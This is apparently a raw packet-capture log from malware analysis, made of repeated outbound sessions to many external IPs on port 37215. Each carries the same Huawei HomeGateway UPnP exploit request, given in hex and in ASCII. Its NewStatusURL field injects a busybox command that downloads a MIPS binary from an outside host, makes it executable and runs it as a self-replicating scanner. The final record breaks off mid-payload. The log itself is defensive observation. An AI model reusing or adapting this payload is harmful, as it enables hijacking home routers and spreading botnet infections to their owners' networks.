                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1942192.168.2.155869820.228.10.21737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.025743961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1943192.168.2.1551204197.166.204.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033147097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1944192.168.2.1553020197.216.102.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033178091 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1945192.168.2.155615841.12.187.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033200026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1946192.168.2.1542120157.0.184.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033221960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1947192.168.2.155055041.82.130.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033233881 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1948192.168.2.154208695.148.250.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033324003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1949192.168.2.1548896197.71.134.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033346891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1950192.168.2.1545704128.166.242.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033366919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1951192.168.2.153536041.33.164.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.033382893 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 